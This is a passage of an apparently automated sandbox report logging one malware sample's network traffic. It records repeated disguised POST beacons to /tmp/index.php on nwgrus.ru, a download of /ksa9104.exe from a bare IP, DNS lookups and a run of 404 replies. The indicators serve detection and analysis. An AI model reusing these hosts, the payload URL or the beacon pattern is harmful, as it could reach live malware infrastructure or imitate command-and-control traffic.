    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wygnfgjkntpabtiq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhkqchnxwnhum.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nscyrydfuavfv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cktuxsueygng.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxcesnnxlrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdmqecpndyox.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqwauqujlltwos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uciyasnlqtuqe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ansjcylnamd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcmbohrajfpmnq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elwljkaryvt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctivelvucvmgu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://coulxlduqqt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pohgsixvlqwy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nwgrus.ru
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
    Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
    Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
    Source: global trafficDNS traffic detected: DNS query: fallhandbat.com
    Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbokbuwfpvoxbkg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this 